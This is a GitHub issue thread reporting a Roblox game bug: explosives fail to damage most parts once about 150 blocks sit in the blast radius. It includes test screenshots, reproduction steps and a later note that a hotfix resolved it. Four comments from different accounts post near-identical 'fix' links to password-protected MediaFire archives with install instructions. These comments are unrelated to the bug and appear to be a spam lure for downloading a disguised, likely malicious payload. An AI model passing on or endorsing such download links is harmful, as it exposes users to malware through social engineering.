### ISSUE TITLE
Explosives failing to damage parts once part count in radius reaches ~150

### ISSUE THREAD

**Issue by CL-2812** [Eggs-D-Studios/wos-issues#279]
### Guidelines

- [X] I checked for duplicate bug reports
- [X] I tried to find a way to reproduce the bug

### Version

Main (Production)

### What happened? What did you expect to happen?

As title.
Once part count in explosive radius reaches ~150, the explosive fails to damage some parts.
As part count increase further, more parts become undamaged.

Experiment below demonstrates this bug.

Setup:
![image](https://github.com/user-attachments/assets/649637b0-e506-4e25-a99b-89bff68852a3)
Expected result:
All wood blocks would be destroyed after the explosive is detonated

Test 1 - 125 blocks : no blocks (0%) are undamaged
![RobloxScreenShot20240827_011412650](https://github.com/user-attachments/assets/094df578-b949-4ae4-abe6-6cd2928fac7c)

Test 2 - 150 blocks : ~100 blocks (66%) undamaged
![RobloxScreenShot20240827_011503870](https://github.com/user-attachments/assets/685b733a-09e2-4676-9b8a-c3bb13b0c4eb)

Test 3 - 175 blocks : ~150 blocks (86%) undamaged
![RobloxScreenShot20240827_011557020](https://github.com/user-attachments/assets/a3b72c70-506e-40db-9bf0-0faed2baf89f)

Test 4 - 200 blocks : ~185 blocks (92.5%) undamaged
![RobloxScreenShot20240827_011650409](https://github.com/user-attachments/assets/5e3d75e3-4879-4281-9255-3dd28cc04a0c)

Test 5 - 250 blocks : ~ 240 blocks (96%) undamaged
![RobloxScreenShot20240827_011839632](https://github.com/user-attachments/assets/45462830-cd65-42b5-99f1-03e449272ac0)

Test 6 - 300 blocks ~293 blocks (98%) undamaged
![RobloxScreenShot20240827_011941601](https://github.com/user-attachments/assets/a62e2fba-3f6f-48b9-86c8-f294f1214d92)

### How can we reproduce this bug?

1. Open .rbxl file stored in [explosive test.zip](https://github.com/user-attachments/files/16751900/explosive.test.zip)

2. Refer to the image below. Move the desired number of tiles to the target, which is 100 blocks by default. Each tile consists of 25 wooden blocks. 
![image](https://github.com/user-attachments/assets/23c4cb78-3816-44fc-83cd-c48f6d338275)

3. Refer to the image below. Compile the circled parts using MBT.
![image](https://github.com/user-attachments/assets/3a2783ad-5871-4019-aaaf-797c27be2932)

4. Load in test place

5. Detonate the explosive by placing and clicking a button on the explosive.

6. Wait a few seconds as the server processes the explosion.

7. Observe the result.

### Frequency

Always

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CL-2812** [comment]
After the hotfix released on 2024-09-01 (see message [https://discord.com/channels/616089055532417036/685118583713562647/1279704122668351544](url) ), the issue has been resolved.
